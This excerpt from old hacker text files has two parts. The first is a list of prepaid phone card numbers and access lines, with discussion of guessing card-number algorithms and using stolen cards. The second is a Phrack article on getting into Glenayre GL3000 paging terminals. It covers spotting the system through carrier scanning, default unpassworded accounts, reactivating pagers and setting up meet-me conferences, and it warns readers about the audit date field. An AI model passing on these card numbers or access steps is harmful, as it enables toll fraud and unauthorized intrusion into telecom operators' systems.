  13149.  
  13150. Caber
  13151. ~~~~~
  13152. $5.00       165-489-4170  537-697-8358  912-314-0132  262-820-0154
  13153.             733-374-4010  758-499-2904  143-364-3554  ------------
  13154. $10.00      305-323-5850  377-902-5824  907-042-1346  602-878-3072
  13155. $20.00      767-610-2118  095-943-2248  448-047-2990  024-530-4614
  13156.             590-074-9540
  13157.  
  13158. Talk Lite
  13159. ~~~~~~~~~
  13160. $5.00       863-406-9186  733-374-4010  590-074-9540
  13161. $10.00      782-512-4340  940-704-3046  303-054-9748
  13162. $20.00      355-227-7378  011-113-5408
  13163.  
  13164. General Info
  13165. ~~~~~~~~~~~~
  13166. I noticed some stuff in the Sunday coupon section.  Some food company is
  13167. giving 10 minute cards if you send in proofs of purchase; so is Polaroid
  13168. (with a nifty hologram kard).
  13169.  
  13170. More Cards
  13171. ~~~~~~~~~~
  13172.  
  13173. - Revco Talk N' Toss  - $?? -  128-341-864 - Dialup - See Separate Review
  13174. - Sprint PCC's        - $10 - 403-398-8344 - Dialup - 800-659-1010 -
  13175.  
  13176.  
  13177. [- You can try to find algorithms with those -]
  13178.  
  13179. Yet another:
  13180.  
  13181. Sprint Instant Foncard
  13182. 800-659-1010
  13183. 10 Digits
  13184.  
  13185. 800-366-0707 Customer Service
  13186. Available in $5, $10, $20, and $50.
  13187.  
  13188. Have you noticed just how *nice and helpful* the customer service people are?
  13189.  
  13190. Later,
  13191. Al
  13192.  
  13193.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13194.  
  13195. A Post From An Unknown User in Atlanta :
  13196.  
  13197. As far as PCC's go, I noticed on 4 or 5 of mine that all of the numbers were
  13198. divisible by 33... Maybe there's some sort of algorithm that controls the
  13199. numbers on these cards.  This particular case was an MCI/NBC sweepstakes, each
  13200. card giving 10 minutes...
  13201.  
  13202. Another thing to wonder about when "carding" these cards:  Sooner
  13203. or later, someone must notice people carding.  So, do they track
  13204. these cards or anything?  Or do you just have to use them short-term,
  13205. etc...?  To anyone that works for a convenience store:  what's the
  13206. policy on stolen cards?  Do you report them to AT&T or whomever as
  13207. stolen?  Give them numbers?  And what follow up is done?
  13208.  
  13209.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13210.  
  13211. Recently in a trip to Boston [617] I was at a magazine stand.  After
  13212. I put down the newest Hustler I saw a rack of brochures from a service
  13213. called "Worldcall 2000 - The World's Most Advanced Prepaid Telephone
  13214. Service."  Since I was working on this text, I thought I'd pick
  13215. it up for some info.
  13216.  
  13217. Their cards some in $10, $20, $30 and $50 telephone card increments.
  13218. They also have service available in 10 different languages, although what
  13219. languages I don't know.  They have international and domestic dialing
  13220. capabilities with cheap rates.  Plus, they have a built in VMB with forward
  13221. messaging and recharge capability.  The customer service department is
  13222. [800] 576-8522.
  13223.  
  13224. Here's what you do:  Dial [800] 576-9959, enter the PiN, then for a domestic
  13225. call, dial 1+ACN; for international dial 011+Number.  If you fuck up,
  13226. just hit "*" to enter another number.  To make another call when you're
  13227. done just hit "#".  That's a rather sweet feature.  (This is from AT&T.)
  13228.  
  13229.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13230.  
  13231. Here's a first:  Recently at a local book store I was reading the new
  13232. issue of Fangoria.  In it, I saw an add for Freddy Krueger PCCs!
  13233. (you know the man...)  "Bullshit," I thought.  They come in 4 different
  13234. cards, each with a new fun, gruesome decapitation by my man Freddy. Then
  13235. the biggest bullshit of all:  "Good For Making Local Calls."  These
  13236. cards are only available in 15 minute cards.  Plus they're $14.95 + $x.xx
  13237. shipping and handling.  I don't know any more about them than that.
  13238.  
  13239.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13240.  
  13241. Here's Some Stuff From Me Bud, Antediluvian [4o4]
  13242.  
  13243.  
  13244. Drug Emporium is offering a $10 card with a total value for up to 25
  13245. minutes. You can call both domestic and international. The number is:
  13246. [800] 866-7495. One that I have already used is 2105-253-835, therefore they
  13247. are 10 digits.
  13248.  
  13249. I hear that Taco Bell has some awesome prepaids too. I'll look into that
  13250. for you.  Also a friend of mine, ViRuS?, (with the question mark) who runs
  13251. DCi has an algorithm for a prepaid, TLI or something like that... I have to
  13252. deliver some files to him so I'll ask about it.
  13253.                                         ...     Ante
  13254.  
  13255.  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
  13256.  
  13257. Here is a list of the numbers I went over and a brief note on each one.
  13258. (Listed in order from least amount of digits to highest.)
  13259.  
  13260. Systems
  13261. ~~~~~~~
  13262. Pepsi                        [800] 929-CoLA - 14 Digits
  13263. PrimeCall                    [800] 866-6915 - 14 Digits
  13264. Transcard                    [800] 326-4880 - 11 Digits
  13265. Sprint Instant Foncard       [800] 659-1010 - 10 Digits
  13266. Caber Communications         [800] 868-9871 - 10 Digits
  13267. Caber/Talk Lite              [800] 429-9547 - 10 Digits
  13268. Talk n Toss/Revco Cards      [800] 213-0304 - 10 Digits
  13269. Champs Sporting Goods        [800] 437-6404 - 10 Digits
  13270. Hallmark/Sprint              [800] 504-1115 - 10 Digits
  13271. Hallmark/Sprint/Holidays     [800] 203-1225 - 10 Digits
  13272. Hallmark/Sprint/Valentines   [800] 214-0214 - 10 Digits
  13273. Classic Games                [800] 868-9871 - 10 Digits
  13274. Drug Emporium                [800] 866-7495 - 10 Digits
  13275. AT&T/Knights Inn             [800] 357-PAiD - 9  Digits
  13276. Electronic Boutiques         [800] 233-1363 - 9  Digits
  13277. X-Men/Kay Bee Toys           [800] 616-8883 - 9  Digits
  13278. Talk n Toss/Hello Direct     [800] 955-2383 - 9  Digits
  13279. Western Union                [800] 374-8686 - 8  Digits
  13280. WorldCall 2000               [800] 576-9959 - ?  Digits
  13281.  
  13282. Other
  13283. ~~~~~
  13284. Ordering GTE Football Cards  [800] GTE-3804 - Ordering GTE Football Cards
  13285. Ordering GTE In 303 NPA      [303] 743-4138 - See Up + From Outside US
  13286. Ordering GTE In 303 NPA Fax  [303] 727-4994 - Faxing Orders For GTE Footballs
  13287. Talk n Toss/Revco/CS         [800] 354-2708 - Customer Service
  13288. Talk n Toss Customer Service [800] 631-8895 - Ordering Bulk
  13289. Var-Tec Telecom              [800] 583-8111 - Ordering Prepaid Phone Pass
  13290. Caber Customer Service       [800] 716-2444 - Customer Service
  13291. Caber Customer Service       [404] 876-2444 - Customer Service
  13292. Primecall Customer Service   [800] 938-4949 - Customer Service
  13293. Western Union CS             [800] 374-8686 - Customer Service
  13294. AT&T/Knights Inn CS          [800] 462-1818 - Customer Service
  13295. WorldCall 2000 CS            [800] 576-8522 - Customer Service
  13296. Transcard CS                 [800] 772-7293 - Customer Service
  13297. Sprint Instant Foncard       [800] 366-0707 - Customer Service
  13298.  
  13299. ------------------------------------------------------------------------------
  13300.                                 ThE EnD
  13301.     For More Information Contact The Author Over The Internet At :
  13302.  
  13303.                       : treason@fpg.gcomm.com :
  13304.  
  13305.     Leave, Suggestions, Ideas, More Information and Collective Criticism
  13306.  
  13307.                   "We Are The Damned Of All The World..."
  13308.                                 - Megadeth
  13309. ------------------------------------------------------------------------------
  13310.                         ..........................
  13311.                         .         - by -         .
  13312.                         .     Treason [518]      .
  13313.                         .        [PAiN]          .
  13314.                         ..........................
  13315.  
  13316. ./\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\.
  13317. .--=]] NoDE 1     Call Another Way Of Life BBS 518.383.1369     NoDE 1  [[=--.
  13318. .\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/.
  13319.  
  13320. ./\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\.
  13321. .--=]] NoDE 2     Call Another Way Of Life BBS 518.383.o268     NoDE 2  [[=--.
  13322. .\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/.
  13323.                               ==Phrack Magazine==
  13324.  
  13325.                  Volume Six, Issue Forty-Seven, File 14 of 22
  13326.  
  13327.  
  13328.            The Glenayre GL3000 Paging and Voice Retrieval System
  13329.                                  by armitage
  13330.                              (armitage@dhp.com)
  13331.  
  13332.                                   Welcome
  13333.                                   -------
  13334.     I am glad you decided to read this article.  This article will explain
  13335. the basis of what this system is, show many features, and guide you through
  13336. a few basic operations (pager reactivation, and meet-me setup).  This system
  13337. is one of many different paging systems, but I have found many scattered
  13338. through the nation, so if you are wondering what you can do with all those
  13339. carriers found while scanning, compare them to the login screen shown later
  13340. in the article.
  13341.  
  13342.                                   Summary
  13343.                                   -------
  13344.  
  13345.     The Glenayre GL3000 paging and voice retrieval system is a fully featured
  13346. digital radio paging terminal which also provides integrated voice mailbox
  13347. facilities.
  13348.  
  13349.     I'm sure this is not important, but so you know, the gl3000 family comes
  13350. in 5 different respective sizes (es, s, m, l, and xl).  All of the systems
  13351. have same features except the only thing that differs is their bandwidth, and
  13352. their capabilities.
  13353.  
  13354.     Analog and digital paging formats are supported, it provides for tone only,
  13355. voice, numeric, and alphanumeric paging.
  13356.  
  13357.                                   Features
  13358.                                   --------
  13359. Voice Mail Box Features
  13360. -----------------------
  13361.  
  13362.     The voice mail box feature of the system complements the pager router
  13363. system very nicely.  This voice mail system is just like any other, so I
  13364. won't go into detail over it.
  13365.  
  13366. Programming
  13367.  
  13368.   Mailbox access code
  13369.     Main menu : 1
  13370.     Subscriber Information Menu : 1
  13371.     Search for subscribers to edit/create
  13372.  
  13373.   Meetme access code
  13374.     Supervisors Main Menu : 5
  13375.     System Setup Menu : 3
  13376.     Trunk Setup Menu : 11
  13377.     Meet-me parameters
  13378.  
  13379.   Audio Billboard
  13380.     Supervisors Main Menu : 5
  13381.     System Setup Menu : 9
  13382.     Voice Storage and Mailbox Setup Menu : 2
  13383.     Voice Mailbox Setup parameters
  13384.  
  13385.   Pager Alert
  13386.     Supervisors Main Menu : 5
  13387.     System Setup Menu : 3
  13388.     Trunk Setup Menu : 10
  13389.     Caller Notification Message Setup
  13390.  
  13391. Voice Main Menu Hierarchy
  13392. -------------------------
  13393.  
  13394. Supervisor's Main Menu
  13395. 1 < Subscriber Information Menu
  13396.     1 < Edit/Create Subscribers
  13397.     2 < Delete A Subscriber
  13398.     3 < Report Subscriber Information
  13399.     4 < Report Extended Group Members
  13400.     5 < Report Unused Customer Numbers
  13401.     6 < Report Initialized Centirecords
  13402.     7 < Stop Current Report in Progress
  13403.     8 < Send Test Page
  13404.     9 < Block Change Subscribers
  13405.     10 < Delete Several Subscribers
  13406.     11 < Clear Subscriber Call Statistics
  13407.     12 < Report Pager Type Summary
  13408.     13 < Block Create Subscribers
  13409. 2 < User Number Information
  13410. 3 < System Activity Monitoring and Logging Menu
  13411.     1 < Trunk Status & Activity Monitor
  13412.     2 < UOE Status & Activity Monitor
  13413.     3 < Buffer Memory Status & Activity Monitor
  13414.     4 < Transmit Queue Status Activity Monitor
  13415.     5 < Voice Storage Usage Activity Monitor
  13416.     6 < Voice Storage Report Setup
  13417.     7 < Voice Storage File Activity Monitor
  13418.     8 < Activity Logging Setup
  13419.     9 < Activity Logging Monitor
  13420.     10 < Subscriber Database Information
  13421.     11 < System CPU Activity Monitor
  13422.     12 < Memory Pool Status Monitor
  13423.     13 < RTC Status & Activity Monitor
  13424.     14 < RTC Diagnostic Console
  13425. 4 < System Maintenance Menu
  13426.     1 < Save Database and System Setup Parameters to floppy
  13427.     2 < Add Customer Numbers
  13428.     3 < Remove Customer Numbers
  13429.     4 < Change Customer Numbers
  13430. 5 < System Setup Menu
  13431.     1 < System Parameters
  13432.     2 < Subscriber Setup Menu
  13433.         1 < Subscriber Default Parameters
  13434.         2 < Subscriber Reports Default Parameters
  13435.     3 < Trunk Setup Menu
  13436.         1 < Individual Trunk Parameters
  13437.         2 < Trunk Group Parameters
  13438.         3 < Trunk Card Parameters
  13439.         4 < Common Trunk Parameters
  13440.         5 < Common Trunk Statistics
  13441.         6 < Common Trunk End of Call Parameters
  13442.         7 < Roaming Caller Location Code Setup
  13443.         8 < Digital Trunk Card Alarm Parameters
  13444.         9 < Digital Trunk Address Signalling Protocol
  13445.         10 < Caller Notification Message Setup
  13446.         11 < Meet-me Parameters
  13447.     4 < Buffer Memory Setup Menu
  13448.         1 < Individual Buffer Memory Parameters
  13449.         2 < Common Buffer Memory Parameters
  13450.     5 < Universal Output Encoder (UOE) Setup Menu
  13451.         1 < Individual UOE Parameters
  13452.         2 < Common UOE Parameters
  13453.         3 < UOE Test
  13454.     6 < Transmitter Controller Setup Menu
  13455.         1 < Individual Transmitter Controller Parameters
  13456.         2 < Common Transmitter Controller Parameters
  13457.     7 < Page Routing Setup Menu
  13458.         1 < Logical Area Parameters
  13459.         2 < Coverage Region Parameters
  13460.     8 < Printer and Serial Port Setup Menu
  13461.         1 < Serial Port Configuration Parameters
  13462.         2 < Printer Message Parameters
  13463.     9 < Voice Storage and Mailbox Setup Menu
  13464.         1 < Voice Storage Setup Parameters
  13465.         2 < Voice Mailbox Setup Parameters
  13466.         3 < Voice Mailbox Retrieval Mode Key Translation Map
  13467.         4 < Language Syntax Configuration
  13468.     10 < Pager Parameter Setup Menu
  13469.         1 < PUP/Repeat Page Options
  13470.         2 < PUP/Repeat Page Function Code Setup
  13471.         3 < Voice To Alpha Transcription Setup
  13472.         4 < Numeric/Voice Function Code Setup
  13473.     11 < RTC Port Configuration Parameters
  13474. 6 < Remote Sign-on
  13475. 7 < Network Menu
  13476.     1 < Operator Services Menu
  13477.         1 < Netmail Transmission
  13478.         2 < Netmail Configuration
  13479.     2 < Network Setup Menu
  13480.         1 < Common Network Parameters
  13481.         2 < Network Port Configuration Parameters
  13482.         3 < Network Node Configuration Parameters
  13483.         4 < Frequency Code to Coverage Region Map
  13484.     3 < Network Activity Menu
  13485.         1 < Port Status and Activity Monitor
  13486.         2 < Node Status and Output Queue Activity Monitor
  13487. 8 < Traffic Statistics Menu
  13488.     1 < Statistics Parameters
  13489.     2 < Report Statistics
  13490. 9 < Superhex Patch Screen
  13491.  
  13492.  
  13493. Operations
  13494. ----------
  13495.  
  13496. *** Quick Reference Key Usage***
  13497.  
  13498.   <DEL> - Deletes character to the left
  13499.   <CTRL-R> - Re-draws Screen
  13500.   UP - Moves pointer up
  13501.   DOWN - Moves pointer down
  13502.  
  13503.  
  13504. System Menus and Options  -  Navigating the System
  13505. --------------------------------------------------
  13506.  
  13507. ***Changing Subscriber Info***
  13508.  
  13509.                           Screen Shot Below
  13510. -----------------------------------------------------------------------------
  13511.                     GLENAYRE GL3000 PAGING TERMINAL       Version 3.06
  13512.  
  13513.   1. User Number:________
  13514.   2. Password:
  13515.  
  13516.                       Optional Feature Status
  13517.                          Agency:       ON
  13518.                          Networking:   ON
  13519.                          RTC:          ON
  13520.                          Meet-me:      ON
  13521.  
  13522.  
  13523.         Software Creation Date:  MMM DD/YY  HH:MM:SS
  13524.  
  13525.                                                     Command:
  13526.  
  13527. -----------------------------------------------------------------------------
  13528. Logging in is the first step, as you can see you are prompted for a user
  13529. number and password.  The Default for every account is unpassworded, the
  13530. password does not echo on the screen.
  13531.  
  13532. Please Note that the menu options are configured by the access level of your
  13533. account, (for example, an administrators account will have more options than
  13534. a base operators account).  The Menus displayed in this article account that
  13535. a supervisors account is being used.
  13536.  
  13537.  
  13538.                             Screen Shot Below
  13539. -----------------------------------------------------------------------------
  13540.  
  13541.                     GLENAYRE GL3000 PAGING TERMINAL       Version 3.06
  13542.  
  13543.   1. Subscriber Information Menu
  13544.   2. User Number Information
  13545.   3. System Activity Monitoring and Logging Menu
  13546.   4. System Maintenance Menu
  13547.   5. System Setup Menu
  13548.   6. Remote Signon
  13549.   7. Network Menu
  13550.   8. Statistics Menu
  13551.   9. SUPERHEX Patch Screen
  13552.  
  13553.   Currently Signed On:     User 1
  13554.                            System Supervisor
  13555.  
  13556.                                               Command:_________
  13557.  
  13558. -----------------------------------------------------------------------------
  13559. This is the Main menu of the system.  On a normal operators account, not all
  13560. of the options will be available.
  13561.  
  13562. *** To Add (Reactivate a pager) ***
  13563. You want to is Add or "Create" a subscriber.  Go to menu 1 (Subscriber
  13564. Information Menu).
  13565.  
  13566.                             Screen Shot Below
  13567. -----------------------------------------------------------------------------
  13568.  
  13569.         SUBSCRIBER INFORMATION MENU
  13570.  
  13571.   1. Edit/Create Subscribers
  13572.   2. Delete a Subscriber
  13573.   3. Report Subscriber Information
  13574.   4. Report Extended Group Members
  13575.   5. Report Unused Customer Numbers
  13576.   6. Report Initialized Centi records
  13577.   7. Stop Current Report in Progress
  13578.   8. Send Test Page
  13579.   9. Block Change Subscribers
  13580.   10. Delete Several Subscribers
  13581.   11. Clear Subscriber Call Statistics
  13582.   12. Report Pager Type Summary
  13583.   13. Block Create Subscribers
  13584.  
  13585.                                                     Command:____________
  13586.  
  13587. -----------------------------------------------------------------------------
  13588. Now you need to go into option 1 again, to Create a new subscriber.
  13589.  
  13590.                             Screen Shot Below
  13591. -----------------------------------------------------------------------------
  13592.  
  13593. Record 1 of 900    SEARCH FOR SUBSCRIBER TO EDIT/CREATE         Page 1 of 2
  13594.  
  13595.   1.  Customer Number: _____             17. Language Choice:
  13596.   2.  Partition:                         18. Answer Type:
  13597.   3.  Agency Number:                     19. Custom Answer:
  13598.   4.  Encoding Format:                   20. PUP/Repeat Option:
  13599.   5.  Service Type:                      21. Group PUP Option:
  13600.   6.  Capcode:                           22. Repeat Voice:
  13601.                                          23. Mailbox Type:
  13602.                                          24. Purge Time (Hrs):
  13603.   7.  A-Tone Length:                     25. Maximum Messages:
  13604.   8.  B-Tone Length:                     26. Voice Time:
  13605.   9.  Account Number:                    27. Activate Caller Pwd:
  13606.   10. Account Status:                    28. Access/Caller Pwd:
  13607.   11. Account Code:                      29. Autoretrieval:
  13608.   12. Valid:                             30. Meet-me:
  13609.   13. Customer Absent:                   31. Secondary Number:
  13610.   14. Coverage Region:
  13611.   15. Priority:
  13612.                                          34. Extended Group:
  13613.   35. Sort Field #1:                     37. Sort Field #2:
  13614.   36. Sort Order #1:                     38. Sort Order #2:
  13615.  
  13616.                                                         Command:
  13617.  
  13618. -----------------------------------------------------------------------------
  13619.  
  13620. It is important at this point, not to enter information into any field other
  13621. than field number 1, as after you enter the customer number, you enter the
  13622. other information later.
  13623.  
  13624. If you are entering a new subscriber, you want to enter a customer number
  13625. that is not being used.  There will be a record number in the top left to
  13626. show you which records are being used.  In this example we will use number 1.
  13627. So enter the new number and then <RETURN>.  The type CREATE <RETURN> into
  13628. the command line.
  13629.  
  13630.                             Screen Shot Below
  13631. -----------------------------------------------------------------------------
  13632.  
  13633. Record 1 of 900    SEARCH FOR SUBSCRIBER TO EDIT/CREATE         Page 1 of 2
  13634.  
  13635.   1.  Customer Number: 1____             17. Language Choice:     ENGLISH
  13636.   2.  Partition:       A                 18. Answer Type:         SYS 216
  13637.   3.  Agency Number:   0                 19. Custom Answer:       YES
  13638.   4.  Encoding Format: TWOTONE           20. PUP/Repeat Option:   NO
  13639.   5.  Service Type:    VOICE             21. Group PUP Option:    NONE
  13640.   6.  Capcode:         000001F1          22. Repeat Voice:        3
  13641.         A=0            B=0               23. Mailbox Type:        VOICE
  13642.                                          24. Purge Time (Hrs):    NO PURGE
  13643.   7.  A-Tone Length:   8                 25. Maximum Messages:    10
  13644.   8.  B-Tone Length:   16                26. Voice Time:          8
  13645.   9.  Account Number:  4                 27. Activate Caller Pwd: YES
  13646.   10. Account Status:  3                 28. Access/Caller Pwd:   ####/####
  13647.   11. Account Code:    7                 29. Autoretrieval:       NO
  13648.   12. Valid:           YES               30. Meet-me:             NO
  13649.   13. Customer Absent: NO                31. Secondary Number:
  13650.   14. Coverage Region: 1
  13651.   15. Priority:        5
  13652.                                          34. Extended Group:      NO
  13653.   35. Sort Field #1:                     37. Sort Field #2:
  13654.   36. Sort Order #1:                     38. Sort Order #2:
  13655.  
  13656.                                                         Command:
  13657.  
  13658. -----------------------------------------------------------------------------
  13659. The values that are filled into this screen are the defaults that were set
  13660. by the supervisor.  Provided you have all the technical information on
  13661. the inactive pager you have, you will transcribe the pager's technical
  13662. information into this record.
  13663.  
  13664.  
  13665. List of fields
  13666.  
  13667.  Field 1 - Customer Number
  13668.          Customer number, you may not use wild cards.
  13669.  Field 2 - Partition
  13670.          Any Partition Letter may be used. ['A'..'Z'] or a NOT sign followed
  13671.          by a partition letter.
  13672.  Field 3 - Agency Number
  13673.          You may use any search conditions except wild cards.
  13674.  Field 4 - Encoding Format
  13675.          Any encoding format name, or a not sign followed by an encoding
  13676.          format.
  13677.  Field 5 - Service Type
  13678.          You may use any service name, or a not sign w/service type name.
  13679.           Service Names
  13680.             VOICE
  13681.             TONE-ONLY
  13682.             NUMERIC
  13683.             ALPHANUMERIC
  13684.             NUMERIC/VOICE
  13685.             MAILBOX ONLY
  13686.             ROAMER
  13687.             0 TONE ONLY
  13688.             GREETING
  13689.             ALPHAMAIL
  13690.             TAS
  13691.             MEET-ME
  13692.             AUTORETRIEVAL
  13693.  Field 6 - Capcode
  13694.          You may use wild card characters to replace digits.
  13695.  Field 7,8 - A,B-Tone Length
  13696.          You can use any search but the wild card search.
  13697.  Field 9 - Account Number
  13698.          You can use any search but the wild card search.
  13699.  Field 10 - Account Status
  13700.          You can use any search but the wild card search.
  13701.  Field 11 - Account Code
  13702.          You can use any search but the wild card search.
  13703.  Field 12 - Valid
  13704.          YES or NO (valid/invalid account number)
  13705.  Field 13 - Customer Absent
  13706.          YES or NO (absent customer or not)
  13707.  Field 14 - Coverage Region
  13708.          You can use any search but the wild card search.
  13709.  Field 15 - Priority
  13710.          You can use any search but the wild card search.
  13711.  Field 16 - Trace Calls
  13712.          YES or NO
  13713.  Field 17 - Language Choice
  13714.          Simply enter a language of choice.
  13715.  Field 18 - Answer Type
  13716.          Use any search.
  13717.  Field 19 - Customer Answer
  13718.          YES, NO, INSERT, or APPEND
  13719.  Field 20 - PUP/Repeat Option
  13720.  Field 21 - Group PUP Option
  13721.  Field 22 - Repeat Mailbox
  13722.          You can use any search but the wild card search.
  13723.  Field 23 - Mailbox Type
  13724.          You can enter:
  13725.            NO MAILBOX
  13726.            VOICE
  13727.            NUMERIC
  13728.            BOTH
  13729.  Field 24 - Purge Time (Hrs)
  13730.          You can use any search.
  13731.  Field 25 - Maximum Messages
  13732.          You can use any search but the wild card search.
  13733.  Field 26 - Voice Time
  13734.          You can use any search but the wild card search.
  13735.  Field 27 - Activate Caller Password
  13736.          YES or NO
  13737.  Field 28 - Access/Caller Password
  13738.  Field 29 - Autoretrieval
  13739.          YES or NO
  13740.  Field 30 - Meet-me
  13741.          YES or NO to have this subscriber given access to meet-me features.
  13742.  Field 31 - Secondary Number
  13743.          You can use any search but the wild card search.
  13744.  Field 34 - Extended Group
  13745.          YES or NO
  13746.  
  13747.  
  13748. Now we will move on to the second page of the Section
  13749.  
  13750.  
  13751.                             Screen Shot Below
  13752. -----------------------------------------------------------------------------
  13753.  
  13754. Record 1 of 900    SEARCH FOR SUBSCRIBER TO EDIT/CREATE         Page 2 of 2
  13755.  
  13756.   Extended Group Members
  13757.  
  13758.   81. Customer Number:                   41. System Recording:
  13759.   82. Customer Number:                   42. Empty Data Pages:
  13760.   83. Customer Number:                   43. Primary Numbers:
  13761.   84. Customer Number:
  13762.   85. Customer Number:
  13763.   86. Customer Number:
  13764.   87. Customer Number:
  13765.   88. Customer Number:
  13766.   89. Customer Number:
  13767.   90. Customer Number:                   Statistical Fields:
  13768.   91. Customer Number:                   51. Number of Calls
  13769.   92. Customer Number:                   52. Mailbox Storage
  13770.   93. Customer Number:                   53. Character Count:
  13771.   94. Customer Number:                   54. Meet-me Time (mins):
  13772.   95. Customer Number:                   55. Date Created:
  13773.   96. Customer Number:                   56. Date Altered:
  13774.  
  13775.                                                         Command:
  13776.  
  13777. -----------------------------------------------------------------------------
  13778. This page has little significance besides if you are using extended group
  13779. members.  The one thing that is important is field 56.  Look out.
  13780.  
  13781.  
  13782.  
  13783. ***Setting up a Meet-me and its settings***
  13784.  
  13785.  
  13786.                             Screen Shot Below
  13787. -----------------------------------------------------------------------------
  13788.  
  13789.                     GLENAYRE GL3000 PAGING TERMINAL       Version 3.06
  13790.  
  13791.   1. Subscriber Information Menu
  13792.   2. User Number Information
  13793.   3. System Activity Monitoring and Logging Menu
  13794.   4. System Maintenance Menu
  13795.   5. System Setup Menu
  13796.   6. Remote Signon
  13797.   7. Network Menu
  13798.   8. Statistics Menu
  13799.   9. SUPERHEX Patch Screen
  13800.  
  13801.   Currently Signed On:     User 1
  13802.                            System Supervisor
  13803.  
  13804.                                               Command:_________
  13805.  
  13806. -----------------------------------------------------------------------------
  13807. First you want to go into choice "5", The System Setup Menu.
  13808.  
  13809.                             Screen Shot Below
  13810. -----------------------------------------------------------------------------
  13811.  
  13812.         SYSTEM SETUP MENU
  13813.  
  13814.   1.  System Parameters
  13815.   2.  Subscriber Setup Menu
  13816.   3.  Trunk Setup Menu
  13817.   4.  Buffer Memory Setup Menu
  13818.   5.  Universal Output Encoder (UOE) Setup Menu
  13819.   6.  Transmitter Controller Setup Menu
  13820.   7.  Page Routing Setup Menu
  13821.   8.  Printer and Port Setup Menu
  13822.   9.  Voice Storage and Mailbox Setup Menu
  13823.   10. Page Parameter Setup Menu
  13824.   11. RTC Port Configuration Parameters
  13825.  
  13826.                                               Command:_________
  13827.  
  13828. -----------------------------------------------------------------------------
  13829.  
  13830. >From this menu you want to go to the trunk setup menu which is choice "3".
  13831.  
  13832.                             Screen Shot Below
  13833. -----------------------------------------------------------------------------
  13834.  
  13835.         TRUNK SETUP MENU
  13836.  
  13837.   1.  Individual Trunk Parameters
  13838.   2.  Trunk Group Parameters
  13839.   3.  Trunk Card Parameters
  13840.   4.  Common Trunk Parameters
  13841.   5.  Common Trunk Statistics
  13842.   6.  Common Trunk End Of Call Parameters
  13843.   7.  Roaming Caller Location Code Setup
  13844.   8.  Digital Trunk Card Alarm Parameters
  13845.   9.  Digital Trunk Address Signalling Protocol
  13846.   10. Caller Notification Message Setup
  13847.   11. Meet-me Parameters
  13848.  
  13849.                                               Command:_________
  13850.  
  13851. -----------------------------------------------------------------------------
  13852. >From this menu you want to select "11. Meet-me Parameters".
  13853.  
  13854.                             Screen Shot Below
  13855. -----------------------------------------------------------------------------
  13856.  
  13857.         MEET-ME PARAMETERS
  13858.  
  13859.   1. Length of Time to Play Initial Ring(s):
  13860.   2. Wait Time Before Sending Meet-Me Page(s):
  13861.   3. Meet-Me Help Message Interval(s):
  13862.   4. Maximum Number of Meet-Me Help Message(s):
  13863.   5. Tone Played While Waiting for Meet-Me:
  13864.   6. Disable Disconnect Digital During Connection:
  13865.   7. Meet-Me Maximum Hold Time (min):
  13866.   8. Maximum Simultaneous Meet-Me connections:
  13867.   9. Prompt for Access Code Before Meet-Me:
  13868.  
  13869.  
  13870.                                               Command:_________
  13871.  
  13872. -----------------------------------------------------------------------------
  13873. There is online help to guide you to conduct this meet-me.  So go with the
  13874. system on this one.
  13875.  
  13876.  
  13877. Glossary of Terms
  13878. -----------------
  13879.  
  13880.     I have listed some terms you might have trouble with while you are
  13881. playing around with this system, this is nowhere near as many as there are,
  13882. but the most vital are listed below.
  13883.  
  13884. Address - 1. The telephone number dialed by a calling party which identifies
  13885.          the party called.  2. A location or destination in a computer
  13886.          program.
  13887. Bell 103 - The North American standard for 300 bps modems.
  13888. Bell 212A - The North American standard for 1200 bps modems.
  13889. Blocking - The process of grouping data into transmission blocks. The
  13890.          inability of a pabx to service connection requests, usually because
  13891.          its switching matrix can only handle a limited number of connections
  13892.          simultaneously.  Blocking occurs if a call request from a user
  13893.          cannot be handled due to an insufficient number of paths through the
  13894.          switching matrix; blocking thus prevents free stations from
  13895.          communicating.
  13896. Borscht - Acronym for the functions that must be performed in the Central
  13897.          office at the subscriber's analog interface of a digital system.
  13898.          (battery, overvoltage, ringing, supervision, coding, hybrid, and
  13899.          test)
  13900. Broadband - A communication system with a large bandwidth.
  13901. Channel - Electronic communications path, usually of 4,000 Hz (voice)
  13902.          bandwidth.
  13903. Crossbar - A type of telephone switch.
  13904. Crossbar Switch - (In PABX technology) a switch that has multiple vertical
  13905.          paths, multiple horizontal paths, and electromagnetically operated
  13906.          mechanical means for connecting any vertical path with any
  13907.          horizontal path.  Modern PABXs often use an electronic version of
  13908.          the crossbar switch.
  13909. Data - In phone systems: any information other than speech or tones.
  13910. Data Set - The telephone companies term for a modem.
  13911. Decoder - A device that converts information into another form of signals.
  13912.          (A DTMF decoder converts dtmf tones to numerical dtmf values)
  13913. Dial Long Line - Special Service device which extends loop signalling
  13914.          distance.
  13915. Digital - Variable as opposed to constant.  Data characters are coded in
  13916.          discrete, separate pulses or signal levels.  Contrast with Analog.
  13917. Duplex - Simultaneous two-way independent transmissions in both directions.
  13918. Echo - A faint return of transmitted data.
  13919. ESS - (Electronic Switching System): A telephone switching machine using
  13920.          electronics, often combined with electro-mechanical crosspoints,
  13921.          and usually with a stored program computer as the control element.
  13922. FCC - (Federal Communications Commission): A government agency that monitors
  13923.          and regulates all use of the electromagnetic spectrum for
  13924.          communications.
